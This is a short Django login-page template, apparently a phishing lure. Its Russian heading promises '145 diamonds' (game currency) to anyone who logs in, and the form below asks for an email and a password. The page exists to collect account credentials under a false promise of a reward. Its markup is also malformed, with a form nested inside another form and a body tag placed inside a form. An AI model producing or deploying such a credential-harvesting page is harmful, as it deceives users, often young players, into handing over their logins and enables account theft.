{% extends 'main/base.html' %}


{% block title %}{% endblock title %}

{% block content %}

<form method="post">
  {% csrf_token %}

  <body style=" height:100%;display:flex ; justify-content: center; align-items: center;">
    <h3>Войдите Что-бы получить 145 алмазов</h3>
    <div id="login">

      <form name="form-login">
        {{ form.email }}<br>
        {{ form.password }}
        <button type="submit" class="submitbtn">Login</button> 
      </form>
    </div>
  </body>

</form>
{% endblock content %}
